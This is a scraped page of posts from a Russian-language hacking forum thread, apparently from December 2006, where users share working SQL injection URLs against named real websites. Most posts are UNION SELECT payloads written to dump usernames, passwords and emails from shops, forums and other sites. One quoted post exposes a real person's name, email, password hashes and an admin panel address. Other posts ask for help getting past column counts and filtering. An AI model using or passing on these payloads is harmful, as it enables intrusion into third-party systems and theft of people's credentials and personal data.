ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #181  
Старый 26.12.2006, 22:50
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

_http://www.bis-el.kiev.ua/start.php?parent_id=0&part_id=1&article_id=230+uni on+select+2,2,3,4,concat(login,char(58),passwd,cha r(58),email),6,0x46726f6d205b2063617368205d2077697 468206c6f7665,8,9,10,11+from+users/*
логин:пасс:маил
 
Ответить с цитированием

  #182  
Старый 26.12.2006, 23:32
Аватар для Termin@L
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591

Репутация: 123
По умолчанию

Блин тупой пост, сори

Последний раз редактировалось Termin@L; 26.12.2006 в 23:39..
 
Ответить с цитированием

  #183  
Старый 27.12.2006, 00:04
Аватар для Termin@L
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591

Репутация: 123
По умолчанию

Чайку? Ссылка уже была, просто немного её откорректировал))
_http://www.chayclub.ru/index.php?page=63&id=21+union+select+1,2,3,4,5,6,c oncat(login,char(58),password,char(58),email),8+fr om+users/*

------------------------------------------------------------------------
Продолжая перерабатывать ссылки данные здесь:
Вот вам продукт беспечности онлайн магазина, все пароли без хеша, всё открыто)))
http://www.esparto.co.uk/product.php?id=-454+UNION+SELECT+1,2,3,4,concat(email,char(58),pas sword),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31+from+account+limit+ 2,3/*

Последний раз редактировалось Termin@L; 27.12.2006 в 12:26..
 
Ответить с цитированием

  #184  
Старый 27.12.2006, 15:51
Аватар для *D1VER
*D1VER
Участник форума
Регистрация: 05.12.2006
Сообщений: 112
Провел на форуме:
685950

Репутация: 175
Отправить сообщение для *D1VER с помощью ICQ
По умолчанию

http://www.owebmoney.ru/oborona/forum_view.php?sub_id= -1+union+select+concat(email,char(58)),1+from+email s/*

http://www.ehouseholding.ru/?part=4&clause=-1+union+select+1,VERSION(),DATABASE(),4,5,6,USER()/*

Последний раз редактировалось *D1VER; 27.12.2006 в 16:27..
 
Ответить с цитированием

  #185  
Старый 27.12.2006, 20:53
Аватар для Constantine
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

http://www.filmplus.ru/?act=full%20story&movie%20id=34'
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #186  
Старый 28.12.2006, 13:16
Аватар для Termin@L
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591

Репутация: 123
По умолчанию

Цитата:
Сообщение от _Pantera_  
Разберем сайт www.megagym.ru
Для начала находим mysql хэш пароля админа

вот он: 0b1c68e72a1fc2c7
Далее вводим вот такой запрос

и получаем:
Разинков Александр:arazinkov@rambler.ru:3ead10984f 89f310
Вот тут админка:
http://megagym.ru/admin/

Только один нюанс таблица name - имя человека, а не логин.
Сам логин вроде хранится в столбце username.

http://lenta.auctyon.ru/photo/view.php?id=64')+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,12,14,15,16,17,18/*
отсюда можно что-нибудь путное вытащить?

Вот ещё пароли от форума и т.д.
http://www.spbclub.ru/forum2/index.php?topic_id=-1+union+select+concat(login,char(58),password,char (32,32,32,32,72,105,32,102,114,111,109,32,84,101,1 14,109,105,110,64,76)),2+from+users+limit+1,2/*
Помогите подобрать столбцы я блин до 60 набрал, ни фига
http://www.tour-info.ru/news/jvs_news.html?num=-1

Последний раз редактировалось Termin@L; 28.12.2006 в 19:23..
 
Ответить с цитированием

  #187  
Старый 29.12.2006, 10:59
Аватар для aka PSIH
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

http://dist.1c.ru/page.jsp?t=1&Attr=4&Year=2004'+union+SELECT+1,TABL E_NAME,1+FROM+INFORM%20ATION_SCHEMA.TABLES--
 
Ответить с цитированием

  #188  
Старый 29.12.2006, 12:00
Аватар для kair
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286

Репутация: 187
Отправить сообщение для kair с помощью ICQ
По умолчанию

http://www.scangirls.net/foto_pr.php?id=-251%20union%20select%201,2,3,4,5,6,7,8/*--
таблицу подобрать не смог
 
Ответить с цитированием

  #189  
Старый 29.12.2006, 12:05
Аватар для kair
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286

Репутация: 187
Отправить сообщение для kair с помощью ICQ
По умолчанию

точно такойже сайт
http://www.eyla.net/foto_pr.php?id=-251%20union%20select%201,2,3,4,5,6,7,8/*--
видимо таблицы там одинаковые
 
Ответить с цитированием

  #190  
Старый 29.12.2006, 14:07
Аватар для Termin@L
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591

Репутация: 123
По умолчанию

Я не врубился, почему, когда я пытаюсь набрать Database(),http://www.scangirls.net/foto_pr.php?id=-251%20union%20select%201,2,3,4,5,6,7,8/*
меня обламывает и не показывает? Фильтрация?

Последний раз редактировалось Termin@L; 29.12.2006 в 14:09..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ